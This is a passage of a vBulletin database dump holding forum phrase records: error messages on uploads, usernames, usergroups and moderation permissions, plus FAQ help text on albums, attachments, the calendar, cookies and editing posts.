'error', 'Updated Similar Threads Successfully', 'vbulletin', '', 0, ''), (34917, -1, 'updated_styles_successfully', 'error', 'Updated Styles Successfully', 'vbulletin', '', 0, ''), (34918, -1, 'updated_subscription_permissions_successfully', 'error', 'Updated Subscription Permissions Successfully', 'vbulletin', 'vBulletin Solutions', 1146676316, '3.6.0 Beta 1'), (34919, -1, 'updated_threads_posts_successfully', 'error', 'Updated Threads / Posts Successfully', 'vbulletin', '', 0, ''), (34920, -1, 'updated_threads_successfully', 'error', 'Updated Threads Successfully', 'vbulletin', '', 0, ''), (34921, -1, 'updated_user_titles_successfully', 'error', 'Updated User Titles Successfully', 'vbulletin', '', 0, ''), (34922, -1, 'updated_usernames_successfully', 'error', 'Updated User Names Successfully', 'vbulletin', '', 0, ''), (34923, -1, 'updateprofilefields', 'error', 'You have empty profile fields that are required to be filled in. Please visit your profile page to update these fields.', 'vbulletin', 'vBulletin Solutions', 1161597565, '3.6.3'), (34924, -1, 'upload_album_pics_countfull', 'error', 'This picture exceeds your pictures-per-album quota by {1}.', 'vbulletin', 'vBulletin Solutions', 1192541997, '3.7.0 Beta 1'), (34925, -1, 'upload_album_sizefull', 'error', 'This picture exceeds your total album file size quota by {1}.', 'vbulletin', 'vBulletin Solutions', 1192541954, '3.7.0 Beta 1'), (34926, -1, 'upload_attach_exists_this_post', 'error', 'Already attached to this post.', 'vbulletin', '', 0, ''), (34927, -1, 'upload_attach_in_progress', 'error', 'Attachment in Progress.', 'vbulletin', '', 0, ''), (34928, -1, 'upload_attach_in_progress_delete_here', 'error', 'Attachment in Progress. Can be deleted here.', 'vbulletin', '', 0, ''), (34929, -1, 'upload_attachexists', 'error', 'You have already attached this file in thread : {3}', 'vbulletin', '', 0, ''), (34930, -1, 'upload_attachfull_total', 'error', 'Exceeds forum quota by {1}.', 'vbulletin', '', 0, ''), (34931, -1, 'upload_attachfull_user', 'error', 'Exceeds your quota by {1}. Click here to view your attachments', 'vbulletin', '', 0, ''), (34932, -1, 'upload_copyfailed', 'error', 'Failed to write file. Check disc quotas and permissions for the path: {2}', 'vbulletin', 'vBulletin Solutions', 1181926516, '3.6.8'), (34933, -1, 'upload_exceeds_dimensions', 'error', 'The Dimension limits for this filetype are {1} x {2}. We were unable to resize your file so you will need to do so manually and upload it again. Your file is currently {3} x {4}.', 'vbulletin', '', 0, ''), (34934, -1, 'upload_file_created_with_different_version', 'error', 'This file was created using a different version of vBulletin from the one you are running.

Your version: {1}
File version: {2}', 'vbulletin', '', 0, ''), (34935, -1, 'upload_file_exceeds_forum_limit', 'error', 'Your file of {1} bytes exceeds the forum\'s limit of {2} for this filetype.', 'vbulletin', '', 0, ''), (34936, -1, 'upload_file_exceeds_php_limit', 'error', 'File exceeds PHP\'s filesize limit of {1}.', 'vbulletin', '', 0, ''), (34937, -1, 'upload_file_failed', 'error', 'Upload of file failed.', 'vbulletin', '', 0, ''), (34938, -1, 'upload_file_partially_uploaded', 'error', 'File was only partially uploaded due to server problem.', 'vbulletin', '', 0, ''), (34939, -1, 'upload_file_system_is_not_writable', 'error', 'File system directory is not writable.', 'vbulletin', '', 0, ''), (34940, -1, 'upload_fopen_disabled', 'error', 'Remote file uploads have been disabled.', 'vbulletin', '', 0, ''), (34941, -1, 'upload_imageinfo_failed_x', 'error', 'Imageinfo Failed:
{1}
', 'vbulletin', '', 0, ''), (34942, -1, 'upload_invalid_animatedgif', 'error', 'You may not upload animated images.', 'vbulletin', '', 0, ''), (34943, -1, 'upload_invalid_file', 'error', 'Invalid File', 'vbulletin', '', 0, ''), (34944, -1, 'upload_invalid_image', 'error', 'This is not a valid image file.', 'vbulletin', '', 0, ''), (34945, -1, 'upload_invalid_image_extension', 'error', 'This {1} image has the incorrect file extension.', 'vbulletin', '', 0, ''), (34946, -1, 'upload_invalid_imagepath', 'error', 'Unable to save image', 'vbulletin', 'vBulletin Solutions', 1150192126, '3.6.0 Beta 2'), (34947, -1, 'upload_invalid_url', 'error', 'Invalid URL', 'vbulletin', '', 0, ''), (34948, -1, 'upload_remoteimage_toolarge', 'error', 'Remote file is too large', 'vbulletin', '', 0, ''), (34949, -1, 'upload_stopped_by_extension', 'error', 'Upload stopped by a PHP extension', 'vbulletin', 'vBulletin Solutions', 1190139657, '3.7.0 Beta 1'), (34950, -1, 'upload_total_album_pics_countfull', 'error', 'This picture exceeds your total album picture quota by {1}.', 'vbulletin', 'vBulletin Solutions', 1192541938, '3.7.0 Beta 1'), (34951, -1, 'upload_unable_move', 'error', 'Unable to move/copy file', 'vbulletin', '', 0, ''), (34952, -1, 'upload_writefailed', 'error', 'Failed to write file. Check disc quotas and permissions for the path: {2} ({1})', 'vbulletin', 'vBulletin Solutions', 1181925815, '3.6.8'), (34953, -1, 'upload_writefile_failed', 'error', 'Upload failed due to failure writing temporary file.', 'vbulletin', '', 0, ''), (34954, -1, 'user_accounts_merged', 'error', 'User accounts merged. {1} has been deleted.

\r\nYou need to Update User Titles and Ranks and Rebuild Thread Information counters now if you wish to remove traces of {1} from last post information and to update {2}\'s new user title.', 'vbulletin', '', 0, ''), (34955, -1, 'user_accounts_validated', 'error', 'User accounts validated and users notified.', 'vbulletin', '', 0, ''), (34956, -1, 'user_chosen_privacy_prevents_viewing', 'error', 'Sorry, this user has chosen a privacy option that prevents you from viewing this information.', 'vbulletin', 'vBulletin Solutions', 1232635582, '3.8.1'), (34957, -1, 'user_is_protected_from_alteration_by_undeletableusers_var', 'error', 'Sorry, this user is protected from being altered in the config.php file by the $config[\'SpecialUsers\'][\'undeletableusers\'] variable.', 'vbulletin', '', 0, ''), (34958, -1, 'user_no_longer_moderator', 'error', 'It appears that this user is no longer a moderator. The most likely cause for this message is that you accidentally clicked the remove button twice.', 'vbulletin', '', 0, ''), (34959, -1, 'user_records_repaired', 'error', 'All users have been checked and any lost records found have been restored', 'vbulletin', '', 0, ''), (34960, -1, 'user_x_has_been_banned_permanently', 'error', 'User {1} has been banned permanently', 'vbulletin', '', 0, ''), (34961, -1, 'user_x_has_been_banned_until_y', 'error', 'User {1} has been banned until {2}', 'vbulletin', '', 0, ''), (34962, -1, 'useralreadyvote', 'error', 'You have already voted on this poll. Please press back to see the results.', 'vbulletin', '', 0, ''), (34963, -1, 'usergroup_already_member', 'error', 'You are already a member of this group!', 'vbulletin', '', 0, ''), (34964, -1, 'usergroup_cantleave_groupleader', 'error', 'You cannot leave a usergroup of which you are a leader.', 'vbulletin', '', 0, ''), (34965, -1, 'usergroup_cantleave_notmember', 'error', 'You cannot leave a usergroup to which you do not belong!', 'vbulletin', '', 0, ''), (34966, -1, 'usergroup_cantleave_primary', 'error', 'You cannot leave your primary usergroup', 'vbulletin', '', 0, ''), (34967, -1, 'usergroup_equals_secondary', 'error', 'This user\'s primary usergroup is also listed as a secondary group for this user. Please change the primary group or remove the secondary group.', 'vbulletin', '', 0, ''), (34968, -1, 'usergroup_invaliddisplaygroup', 'error', 'The usergroup you specified cannot be used as a primary display group', 'vbulletin', '', 0, ''), (34969, -1, 'usergroup_not_public_or_invalid', 'error', 'The usergroup you selected is either not a public group, or does not exist', 'vbulletin', '', 0, ''), (34970, -1, 'usergroup_notpublic', 'error', 'This does not appear to be a public user group.', 'vbulletin', '', 0, ''), (34971, -1, 'usergroupleader_deleted', 'error', 'You did not specify any users to delete.', 'vbulletin', '', 0, ''), (34972, -1, 'username_contains_semi_colons', 'error', 'Sorry, the username entered contains one or more semi-colon characters ( ; ).

Please go back and remove any semi-colons', 'vbulletin', '', 0, ''), (34973, -1, 'username_same_as_password', 'error', 'Your password is the same as your username. This is no longer allowed.
\r\n
\r\nPlease change your password using this page.', 'vbulletin', 'vBulletin Solutions', 1219143165, '3.8.0 Alpha 1'), (34974, -1, 'usernametaken', 'error', 'That username is already in use or does not meet the administrator\'s standards. If you are {1} and you have forgotten your password, click here.', 'vbulletin', 'vBulletin Solutions', 1171279360, '3.6.5'), (34975, -1, 'usernametaken_edit_here', 'error', 'The username {1} is already in use. You can edit that user here', 'vbulletin', '', 0, ''), (34976, -1, 'usernametoolong', 'error', 'Your username cannot be longer than {1} characters.', 'vbulletin', '', 0, ''), (34977, -1, 'usernametooshort', 'error', 'Your username cannot be shorter than {1} characters.', 'vbulletin', '', 0, ''), (34978, -1, 'usernoemail', 'error', 'Sorry! That user has specified that they do not wish to receive emails. If you still wish to send an email to this user, please contact the administrator and they may be able to help.', 'vbulletin', '', 0, ''), (34979, -1, 'usernotenotallowed', 'error', 'Leaving user notes for members of this usergroup is not allowed.', 'vbulletin', 'vBulletin Solutions', 1213610598, '3.8.0 Alpha 1'), (34980, -1, 'variable_name_exists', 'error', 'You have attempted to change the variable name from \'{1}\' to \'{2}\', but a phrase already exists with the variable name \'{2}\'. - The update cannot continue', 'vbulletin', '', 0, ''), (34981, -1, 'variables_missing_suhosin', 'error', 'Required variables have gone missing and execution can not continue. Please try again.
\r\n
\r\nThis error can sometimes occur as a result of Suhosin / Hardened PHP being installed on your server. If you know that you have Suhosin running and you have access to the PHP configuration, try increasing the value of the following variables:\r\n
    \r\n
  • php_value suhosin.post.max_vars
  • \r\n
  • php_value suhosin.request.max_vars
  • \r\n
', 'vbulletin', 'vBulletin Solutions', 1200570235, '3.7.0 Beta 4'), (34982, -1, 'verify_hash_failed_contact_admin_revert_template', 'error', 'Verification hash check failed. Please contact the administrator and ask that he or she revert the following template: {2}.', 'vbulletin', 'vBulletin Solutions', 1207828516, '3.7.0 Release Candidate 3'), (34983, -1, 'version_check_connect_failed_host_x_error_y', 'error', 'Version check connection to host {1} failed. Please try again later.
\r\n
\r\nThe error returned was: \'{2}\'', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34984, -1, 'version_check_failed_not_found', 'error', 'Version check failed. No version number was found at this location. The URL for the version check may be incorrect, or the server may be experiencing problems. Please try again later.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34985, -1, 'whosonlinedisabled', 'error', 'The administrator has disabled Who\'s Online.', 'vbulletin', '', 0, ''), (34986, -1, 'xml_error_x_at_line_y', 'error', 'XML Error: {1} at Line {2}', 'vbulletin', '', 0, ''), (34987, -1, 'you_are_limited_to_working_with_x_discussions', 'error', 'You are limited to working with {1} discussions', 'vbulletin', 'vBulletin Solutions', 1214238020, '3.7.1'), (34988, -1, 'you_are_limited_to_working_with_x_messages', 'error', 'You are limited to working with {1} messages', 'vbulletin', 'vBulletin Solutions', 1191952106, '3.7.0 Beta 1'), (34989, -1, 'you_are_limited_to_working_with_x_pictures', 'error', 'You are limited to working with {1} pictures.', 'vbulletin', 'vBulletin Solutions', 1203721472, '3.7.0 Beta 6'), (34990, -1, 'you_are_limited_to_working_with_x_posts', 'error', 'You are limited to working with {1} post(s)', 'vbulletin', 'vBulletin Solutions', 1150509223, '3.6.0 Beta 3'), (34991, -1, 'you_are_limited_to_working_with_x_threads', 'error', 'You are limited to working with {1} threads', 'vbulletin', '', 0, ''), (34992, -1, 'you_are_not_allowed_to_warn_moderators', 'error', 'You are not allowed to give warnings or infractions to Moderators.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (34993, -1, 'you_can_not_remove_vbulletin_copyright', 'error', 'Sorry, you cannot remove the vBulletin copyright text using this page.

You must use the main template editor to do this, if your license allows you to remove the vBulletin copyright text.', 'vbulletin', '', 0, ''), (34994, -1, 'you_can_only_create_x_groups', 'error', 'You can only create {1} group(s). ', 'vbulletin', 'vBulletin Solutions', 1218711488, '3.8.0 Alpha 1'), (34995, -1, 'you_can_only_create_x_groups_delete', 'error', 'You can only create {1} group(s). You may delete a group in order to create a new one.', 'vbulletin', 'vBulletin Solutions', 1218711450, '3.8.0 Alpha 1'), (34996, -1, 'you_did_not_enter_a_valid_value', 'error', 'You did not enter a valid value for this setting.', 'vbulletin', 'vBulletin Solutions', 1149694439, '3.6.0 Beta 1'), (34997, -1, 'you_did_not_select_any_prefixes', 'error', 'You did not select any prefixes.', 'vbulletin', 'vBulletin Solutions', 1216748060, '3.8.0 Alpha 1'), (34998, -1, 'you_did_not_select_any_valid_discussions', 'error', 'You did not select any valid discussions', 'vbulletin', 'vBulletin Solutions', 1214237966, '3.7.1'), (34999, -1, 'you_did_not_select_any_valid_messages', 'error', 'You did not select any valid messages', 'vbulletin', 'vBulletin Solutions', 1191952048, '3.7.0 Beta 1'), (35000, -1, 'you_did_not_select_any_valid_pictures', 'error', 'You did not select any valid pictures.', 'vbulletin', 'vBulletin Solutions', 1203721456, '3.7.0 Beta 6'), (35001, -1, 'you_did_not_select_any_valid_threads', 'error', 'You did not select any valid threads', 'vbulletin', '', 0, ''), (35002, -1, 'you_do_not_have_permission_forum', 'error', 'You do not have permission to manage announcements in this forum.', 'vbulletin', '', 0, ''), (35003, -1, 'you_do_not_have_permission_global', 'error', 'You do not have permission to manage Global announcements.', 'vbulletin', '', 0, ''), (35004, -1, 'you_do_not_have_permission_to_delete_discussions', 'error', 'You do not have permission to delete discussions.', 'vbulletin', 'vBulletin Solutions', 1212493565, '3.7.1'), (35005, -1, 'you_do_not_have_permission_to_delete_messages', 'error', 'You do not have permission to delete messages', 'vbulletin', 'vBulletin Solutions', 1191952350, '3.7.0 Beta 1'), (35006, -1, 'you_do_not_have_permission_to_delete_pictures', 'error', 'You do not have permission to delete pictures.', 'vbulletin', 'vBulletin Solutions', 1203723889, '3.7.0 Beta 6'), (35007, -1, 'you_do_not_have_permission_to_delete_selected_discussions', 'error', 'You do not have permission to delete all of the selected discussions.', 'vbulletin', 'vBulletin Solutions', 1212493844, '3.7.1'), (35008, -1, 'you_do_not_have_permission_to_delete_selected_messages', 'error', 'You do not have permission to delete all of the selected social group messages.', 'vbulletin', 'vBulletin Solutions', 1212493930, '3.7.1'), (35009, -1, 'you_do_not_have_permission_to_delete_threads_and_posts', 'error', 'You do not have permission to delete threads and posts

\r\nPost: {1}
\r\nThread: {2}
\r\nForum: {3}', 'vbulletin', '', 0, ''), (35010, -1, 'you_do_not_have_permission_to_hard_delete_discussions', 'error', 'You do not have permission to physically delete discussions.', 'vbulletin', 'vBulletin Solutions', 1212493535, '3.7.1'), (35011, -1, 'you_do_not_have_permission_to_hard_delete_messages', 'error', 'You do not have permission to physically delete social group messages.', 'vbulletin', 'vBulletin Solutions', 1212493626, '3.7.1'), (35012, -1, 'you_do_not_have_permission_to_manage_deleted_discussions', 'error', 'You do not have permissions to manage deleted discussions', 'vbulletin', 'vBulletin Solutions', 1212162270, '3.7.1'), (35013, -1, 'you_do_not_have_permission_to_manage_deleted_messages', 'error', 'You do not have permission to manage deleted messages', 'vbulletin', 'vBulletin Solutions', 1191952189, '3.7.0 Beta 1'), (35014, -1, 'you_do_not_have_permission_to_manage_deleted_threads_and_posts', 'error', 'You do not have permission to manage deleted threads and posts

\r\nPost: {1}
\r\nThread: {2}
\r\nForum: {3}', 'vbulletin', '', 0, ''), (35015, -1, 'you_do_not_have_permission_to_manage_deleted_threads_and_posts_in_destination_forum', 'error', 'You do not have permission to manage deleted threads and posts in the destination forum', 'vbulletin', '', 0, ''), (35016, -1, 'you_do_not_have_permission_to_manage_moderated_attachments', 'error', 'You do not have permission to manage moderated attachments

Post: {1}
Thread: {2}
Forum: {3}', 'vbulletin', '', 0, ''), (35017, -1, 'you_do_not_have_permission_to_manage_moderated_discussions', 'error', 'You do not have permission to manage moderated discussions.', 'vbulletin', 'vBulletin Solutions', 1212058495, '3.7.1'), (35018, -1, 'you_do_not_have_permission_to_manage_moderated_messages', 'error', 'You do not have permission to manage moderated messages.', 'vbulletin', 'vBulletin Solutions', 1212058467, '3.7.1'), (35019, -1, 'you_do_not_have_permission_to_manage_moderated_threads_and_posts', 'error', 'You do not have permission to manage moderated threads and posts', 'vbulletin', '', 0, ''), (35020, -1, 'you_do_not_have_permission_to_manage_moderated_threads_and_posts_in_destination_forum', 'error', 'You do not have permission to manage moderated threads and posts in the destination forum', 'vbulletin', '', 0, ''), (35021, -1, 'you_do_not_have_permission_to_manage_thread_redirects', 'error', 'You do not have permission to manage thread redirects

\r\nThread: {1}
\r\nForum: {2}', 'vbulletin', '', 0, ''), (35022, -1, 'you_do_not_have_permission_to_manage_threads_and_posts', 'error', 'You do not have permission to manage threads and posts

\r\nPost: {1}
\r\nThread: {2}
\r\nForum: {3}', 'vbulletin', '', 0, ''), (35023, -1, 'you_do_not_have_permission_to_moderate_discussions', 'error', 'You do not have permission to moderate discussions', 'vbulletin', 'vBulletin Solutions', 1212162465, '3.7.1'), (35024, -1, 'you_do_not_have_permission_to_moderate_messages', 'error', 'You do not have permission to moderate messages', 'vbulletin', 'vBulletin Solutions', 1191952217, '3.7.0 Beta 1'), (35025, -1, 'you_do_not_have_permission_to_moderate_pictures', 'error', 'You do not have permission to moderate pictures.', 'vbulletin', 'vBulletin Solutions', 1203721822, '3.7.0 Beta 6'), (35026, -1, 'you_do_not_have_permission_to_openclose_threads', 'error', 'You do not have permission to open/close threads

\r\nThread: {1}
\r\nForum: {2}', 'vbulletin', '', 0, ''), (35027, -1, 'you_do_not_have_permission_to_soft_delete_discussions', 'error', 'You do not have permission to soft delete discussions.', 'vbulletin', 'vBulletin Solutions', 1212493430, '3.7.1'), (35028, -1, 'you_do_not_have_permission_to_soft_delete_messages', 'error', 'You do not have permission to soft delete social group messages.', 'vbulletin', 'vBulletin Solutions', 1212493672, '3.7.1'), (35029, -1, 'you_do_not_have_permission_to_stickunstick_threads', 'error', 'You do not have permission to stick/unstick threads

\r\nThread: {1}
\r\nForum: {2}', 'vbulletin', '', 0, ''), (35030, -1, 'you_do_not_share_delete_permission', 'error', 'You do not share the same delete permission for all of the posts or threads that have been selected.', 'vbulletin', '', 0, ''), (35031, -1, 'you_have_no_attachments_set_to_thumb', 'error', 'You have not set any attachments to be thumbnailed at Attachments -> Attachment Manager', 'vbulletin', 'vBulletin Solutions', 1182779156, '3.6.8'), (35032, -1, 'you_must_enter_the_password_token_into_the_message', 'error', 'You must enter the password token {password} into the email message.', 'vbulletin', 'vBulletin Solutions', 1219318660, '3.8.0 Alpha 1'), (35033, -1, 'you_must_pick_a_usergroup_or_forum_to_check_permissions', 'error', 'You must pick a usergroup or forum for which to check permissions', 'vbulletin', '', 0, ''), (35034, -1, 'your_search_included_threads', 'error', 'Your search included threads from which you only have permission to view their titles. You may find further results if you choose the \"Search Thread Titles Only\" option.', 'vbulletin', 'vBulletin Solutions', 1170377981, '3.6.5'), (35035, -1, 'your_server_has_safe_mode_enabled', 'error', 'Your server has PHP\'s SAFE_MODE enabled. You cannot move attachments to files while SAFE_MODE is enabled. Please contact your host and ask them to consider disabling it if you wish to use the file system for attachments.', 'vbulletin', '', 0, ''), (35036, -1, 'your_vb_settings_have_been_updated_to_store_attachments_in_x', 'error', 'Your vBulletin settings have now been updated to store attachments in {1} rather than {2}.

You must now manually move all attachments to the new folder, using an FTP client or a shell command such as:

mv -rf {2}/* {1}/', 'vbulletin', '', 0, ''), (35037, -1, 'your_vb_settings_have_been_updated_to_store_group_icons_in_x', 'error', 'Your vBulletin settings have now been updated to store social group icons in {1} rather than {2}.

You must now manually move all group icon images to the new folder, using an FTP client or a shell command such as:

mv -rf {2}/* {1}/', 'vbulletin', 'vBulletin Solutions', 1216905404, '3.8.0 Alpha 1'), (35038, -1, 'your_vb_settings_have_been_updated_to_store_images_in_x', 'error', 'Your vBulletin settings have now been updated to store images in {1} rather than {2}.

You must now manually move all avatars to the new folder, using an FTP client or a shell command such as:

mv -rf {2}/* {1}/', 'vbulletin', '', 0, ''), (35039, -1, 'your_version_no_image_support', 'error', 'Your version of PHP does not have image support. Please make sure you have enabled GD if your server does support it by going to Options -> vBulletin Options -> Image Settings', 'vbulletin', '', 0, ''), (35040, -1, 'yourpmquotaexceeded', 'error', 'You have reached your stored private message quota and cannot send any further messages until space has been created.', 'vbulletin', '', 0, ''), (35041, -1, 'vb3_albums', 'faqtext', '

How do I use albums?

\r\n\r\n

As a member, you can create Albums of images that are linked to your public profile. Albums can be created by visiting the User Control Panel, and clicking on the \'Pictures & Albums\' link, and then clicking on \'Add Album\'.

\r\n\r\n

Each album can have a title (\'Joe\'s Holiday to Nepal\'), a description (\'A bunch of photos from my recent adventure\') and can be of three different types: Public, Private or Profile.

\r\n\r\n
    \r\n
  • Public albums can be viewed by anyone
  • \r\n
  • Private albums can only be viewed by site staff (moderators, administrators) and your Friends and Contacts (info)
  • \r\n
  • Profile albums are viewable only by you. However, you can use the images to customize your public profile (info)
  • \r\n
\r\n\r\n

How do I upload pictures?

\r\n\r\n

Once you\'ve created an album you can upload images to it. Simply view the album and click on \'Upload Pictures\'.

\r\n\r\n

You\'ll have the option to give each picture a caption, and to set one image as the Album cover, which will be displayed on the public profile. To delete an album or edit the title, description or album type, click on \'Edit Album\'. To delete an image, or to edit a caption or change the album cover, click on \'Edit Pictures\'.

\r\n\r\n

All members who have access to your album images can comment on them, in a similar way to Visitor Messages (more info). You can delete any image comments from your albums, and report inappropriate messages to moderators.

\r\n\r\n

When you have uploaded a picture, you can place it in your posts by using the BB code text that is displayed below the image when you view it at full size.

', 'vbulletin', 'vBulletin Solutions', 1232372602, '3.8.1'), (35042, -1, 'vb3_announcements', 'faqtext', '

What are announcements?

\r\n\r\n

Announcements are special messages posted by the administrator or moderators. They are a simple one-way communication with the users and you can\'t reply. If you wish to discuss announcements, you will have to create a new thread in the forum.

\r\n\r\n

Announcement threads are displayed at the top of forum listing pages, above regular and sticky threads.

', 'vbulletin', 'vBulletin Solutions', 1204551344, '3.7.0 Beta 6'), (35043, -1, 'vb3_attachments', 'faqtext', '

How do I attach a file to a post?

\r\n\r\n

To attach a file to your post, you need to be using the main \'New Post\' or \'New Thread\' page and not \'Quick Reply\'. To use the main \'New Post\' page, click the \'Post Reply\' button in the relevant thread.

\r\n\r\n

On this page, below the message box, you will find a button labelled \'Manage Attachments\'. Clicking this button will open a new window for uploading attachments. You can upload an attachment either from your computer or from another URL by using the appropriate box on this page. Alternatively you can click the Attachment Icon to open this page.

\r\n\r\n

To upload a file from your computer, click the \'Browse\' button and locate the file. To upload a file from another URL, enter the full URL for the file in the second box on this page. Once you have completed one of the boxes, click \'Upload\'.

\r\n\r\n

Once the upload is completed the file name will appear below the input boxes in this window. You can then close the window to return to the new post screen.

\r\n\r\n

What files types can I use? How large can attachments be?

\r\n\r\n

In the attachment window you will find a list of the allowed file types and their maximum sizes. Files that are larger than these sizes will be rejected. There may also be an overall quota limit to the number of attachments you can post to the board.

\r\n\r\n

How do I add an image to a post?

\r\n\r\n

If you have uploaded an image as an attachment, you can click the arrow next to the \'Attachment Icon\' and select it from the list. This will be inserted into your post and can be located where you want it displayed.

\r\n\r\n

To include an image that is not uploaded as an attachment and is located on another website, you can do so by copying the full URL to the image, (not the page on which the image is located), and either pressing the \'Insert Image\' icon or by typing [img] before the URL and [/img] after it, ensuring that you do not have any spaces before or after the URL of the image. You can insert pictures from your albums (?) in this way too.

', 'vbulletin', 'vBulletin Solutions', 1207905878, '3.7.0 Release Candidate 4'), (35044, -1, 'vb3_board_faq', 'faqtext', 'Here you can find answers to questions about how the board works. Use the links below or the search box above to find your way around.', 'vbulletin', 'vBulletin Solutions', 1204806694, '3.7.0 Beta 6'), (35045, -1, 'vb3_board_usage', 'faqtext', '', 'vbulletin', 'vBulletin Solutions', 1228216516, '3.8.0 Release Candidate 1'), (35046, -1, 'vb3_calendar', 'faqtext', '

You will see a \'Calendar\' link near the top of the forums (if this option is enabled by the administrator). By default, the forums will have one Calendar that can be viewed and used by all members.

\r\n\r\n

Members can add upcoming events that might interest the community. You can also sign up to get email alerts about upcoming events.

\r\n\r\n

In addition, the administrator could create additional private calendars for individual members or for specific user groups.

\r\n\r\n

How do I add an event to the Calendar?

\r\n\r\n

If you have the appropriate permissions, there will be a box on the Calendar labelled \'Add New Event\'. The administrator may have enabled registered members to post public events, but usually this is not the case. It\'s more likely that you can only post your own private events that can only be seen by you.

\r\n\r\n

There are three types of event that can be added to a calendar:

\r\n\r\n
    \r\n
  • Single, All Day Event - an event that takes place for the whole of a day.
  • \r\n
  • Ranged Event - events that have a defined start time and end time, not necessarily both on the same day.
  • \r\n
  • Recurring Event - repeat over a set period of time based on certain criteria. Examples would be an event that occurs on the first Monday of every month and an event that occurs every Monday and Wednesday.
  • \r\n
\r\n\r\n

Just choose the appropriate option for the event you are adding, fill in the required information, then save the event. It will now appear on the Calendar.

\r\n\r\n

Where do birthdays show?

\r\n\r\n

Birthdays may be shown on the calendar if the administrator has enabled this feature. Your birthday will automatically be shown on the calendar if you have entered the date of your birthday in your profile. Note: if you do not enter the year of your birth when you edit your profile, your age will not be shown on the calendar.

\r\n\r\n

If you enter your birthday, your name will also appear on the main forum page when it is your birthday.

', 'vbulletin', 'vBulletin Solutions', 1207146046, '3.7.0 Release Candidate 3'), (35047, -1, 'vb3_changing_details', 'faqtext', '

How do I change my user details?

\r\n\r\n

You can change your account information using the User Control Panel. For basic profile details (including your email address and password), click on the \'Edit Your Details\' option from within the User CP. This page allows you to set a number of required and optional details, some of which will be displayed on your public profile. With the exception of your email address, do not enter information that you do not wish to be publicly viewable.

', 'vbulletin', 'vBulletin Solutions', 1207146223, '3.7.0 Release Candidate 3'), (35048, -1, 'vb3_contact_members', 'faqtext', '

Can I email other members?

\r\n\r\n

Yes. To send an email to another member, you can either find them on the member list, or click the email user button \"Email on any post they have written.

\r\n\r\n

This will usually open a page that contains a form where you can enter your message. When you have finished typing your message, press the \'send email\' button and your message will be sent instantly.

\r\n\r\n

Can I see email addresses?

\r\n\r\n

For privacy reasons, the recipient\'s email address is not revealed to you during this process.

\r\n\r\n

Why can\'t I send an email to someone?

\r\n\r\n

If you cannot find an email button or link for a member, it means either that the administrator has disabled email functions for this forum, or that the member has said that they do not wish to receive email from other members.

\r\n\r\n

Can I email a link to a friend?

\r\n\r\n

Another useful email function is the ability to send a friend a link to a thread you think they may find interesting. Whenever you view a thread, you will find a link somewhere on the page which will allow you to send a brief message to anyone you like. Your referrer ID is added to the link you send, so if your friend registers on this forum as a result of viewing the link you sent to them, your referrals total will automatically be credited.

\r\n\r\n

What is private messaging?

\r\n\r\n

Registered members may also be able to send messages to other members of this forum using the private messaging system. For more information about private messaging, click here.

\r\n\r\n

What are visitor messages?

\r\n\r\n

Registered members may leave messages for other members on their profile page. These messages can generally be viewed by all visitors, including members, guests and search engine spiders. For more information on visitor messages, click here.

', 'vbulletin', 'vBulletin Solutions', 1207905713, '3.7.0 Release Candidate 4'), (35049, -1, 'vb3_cookies', 'faqtext', '

What is \'Automatic Login\'?

\r\n\r\n

When you register (and also when you login using the form at the top of the screen), you will be given the option to \'Remember Me\'. This will store your identity securely in a cookie on your computer. If you are using a shared computer, such as in a library, school or internet cafe, or if you have reason to not trust any other users that might use this computer, we recommend you do not enable this.

\r\n\r\n

How do I clear cookies?

\r\n\r\n

You can clear all your cookies set by the forum by clicking the \'logout\' link at the top of the page. In some cases, if you return to the main index page via the link provided and you are still logged in, you may have to remove your cookies manually.

\r\n\r\n

In Internet Explorer 6 on Windows XP: Click the \'Tools\' menu. Select \'Internet Options\' from the menu that appears. Click \'Delete Cookies\' on the dialog box that appears. It will be in the center area of the \'General\' tab.

\r\n\r\n

In Internet Explorer 7: Click the \'Tools\' menu. Select \'Internet Options\' from the menu that appears. Click \'Delete...\', beneath \'Browsing History\' on the dialog box that appears. It will be in the center area of the \'General\' tab. Click \'Delete cookies...\' on the next dialog box that appears.

\r\n\r\n

In Firefox: Click the \'Tools\' menu. Select \'Options\' from the menu that appears. From the dialog box, select \'Privacy\' on the left. Find \'Cookies\' on the main pane, and click the \'Clear\' button adjacent to it.

\r\n\r\n

In Safari: Go to Preferences, Security, then show Cookies and either select \'Remove all\' or select individual cookies and then the \'Delete\' button.

\r\n\r\n

In Opera: Go to Tools, Preferences, Advanced, Cookies, Manage cookies then select the name of this site and click the \'Delete\' button.

\r\n\r\n

Your cookies should now be removed. You may want to restart the computer and revisit the forums to be sure.

\r\n\r\n

Other browsers may have a different method of clearing cookies. Refer to the documentation for your own browser if you are unsure.

', 'vbulletin', 'vBulletin Solutions', 1208620809, '3.7.0 Release Candidate 4'), (35050, -1, 'vb3_editing_deleting', 'faqtext', '

Can I edit or delete my posts?

\r\n\r\n

If you have registered and are logged in, you may be able to edit and delete your posts (although the administrator may have turned off this option). Your ability to edit your posts may be time-limited, depending on how the administrator has set up the forum.

\r\n\r\n

To edit or delete your posts, click the Edit \"Edit button by the particular post. If your post was the first in the thread, then deleting it may remove the entire thread.

\r\n\r\n

Once you\'ve made your modifications, a note may appear to inform other users that you have edited your post.

\r\n\r\n

If the edit time and date appear as a link you can click on this to see the differences between the original and edited versions, or between edits if there have been multiple edits.

\r\n\r\n

Can others edit my posts?

\r\n\r\n

Administrators and moderators may also edit your messages. If they do, there may not be a note telling other users that the post was modified.

', 'vbulletin', 'vBulletin Solutions', 1204559380, '3.7.0 Beta 6'), (35051, -1, 'vb3_forums_threads_posts', 'faqtext', '

What is a bulletin board?

\r\n\r\n

A bulletin board is an online discussion site. It\'s sometimes also called a \'board\' or \'forums\'. It may contain several categories, consisting of forums, threads and individual posts.

\r\n\r\n

How is all this structured?

\r\n\r\n

The bulletin board as a whole contains various categories (broad subject areas), which themselves contain forums (more specific subject areas) which contain threads (conversations on a topic) which are made up of individual posts (where a user writes something).

\r\n\r\n

The board home page has a list of categories and forums, with basic statistics for each - including the number of threads and posts, and which member posted the most recent message.

\r\n\r\n

How do I find my way around?

\r\n\r\n

When you click on a forum\'s name, you are taken to the list of threads it contains. A thread is a conversation between members or guests. Each thread starts out as a single post and grows as more individual posts are added by different users. Threads can be rated (?) to show how useful or popular they are and may contain polls (?).

\r\n\r\n

